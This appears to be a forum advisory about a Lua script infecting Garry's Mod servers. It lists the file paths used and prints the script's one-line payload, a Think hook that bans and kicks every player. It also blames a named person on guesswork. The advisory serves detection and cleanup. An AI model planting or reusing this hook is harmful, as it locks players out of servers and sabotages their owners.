Stop messaging me about this, since I do not have anything to do with this.
Symptoms
If everyone on the server is permabanned with the reason “you’re too slow” that means the server is infected with this Lua virus.
Temporary fix
It can be found in the following files:
lua/autorun/server/overv.lua
or
lua/autorun/server/[conna's alt].lua
If there is no such file in the directory, search for the following contents instead:
hook.Add("Think","overvsendshisregards",function() for k,v in ipairs(player.GetAll()) do v:Ban(0,"you're too slow") v:Kick("you're too slow") end end)
After deleting the file, you need to clear the ban list and restart your server. The likely cause is the file exploit which allows clients to upload harmful files to the server and it’s most likely SamuraiMushroom is behind this.
Long term fix
This Lua virus should not be effective anymore after the file exploit has been fixed which is Garry’s task.